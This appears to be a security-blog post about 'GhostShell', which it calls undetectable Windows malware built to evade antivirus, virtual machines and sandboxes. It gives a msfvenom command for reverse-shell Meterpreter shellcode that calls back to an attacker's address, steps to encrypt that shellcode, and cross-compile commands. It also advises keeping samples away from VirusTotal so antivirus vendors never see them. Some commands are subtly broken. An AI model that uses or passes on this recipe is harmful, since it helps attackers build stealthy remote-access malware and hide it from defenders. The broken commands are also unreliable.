GhostShell is a Malware indetectable, with AV bypass techniques, anti-disassembly, etc. In this malware, are used some techniques to try bypass the AVs, VMs, and Sandboxes, with only porpuse to learning more. I’m not responsible for your actions.
Attention!!!
To check if the antivirus is detecting the malware, NEVER send it to the virustotal, IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN, to analyze, send it to https://www.hybrid-analysis.com/ and remember to check the option “Do not send my sample to non-affiliated third parties”, as in the example below.
Also Read – Faraday : Collaborative Penetration Test & Vulnerability Management Platform
Bypass Techniques
Generating the Shellcode
To generate the shellcode type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c
, copy the shellcode generated and encrypt it.
./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""
How to compile for Windows on Linux?
To compile for Windows on Linux, first, install mingw-w64: sudo apt-get install mingw-w64
, then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static
, and to 64 bits: x86_64-w64-mingw32 -o main.exe main.c -l psapi -static
Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…
Docker is one of the most widely used containerization platforms. But there may come a…
Introduction Google Dorking is a technique where advanced search operators are used to uncover information…
Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…
What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…
Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…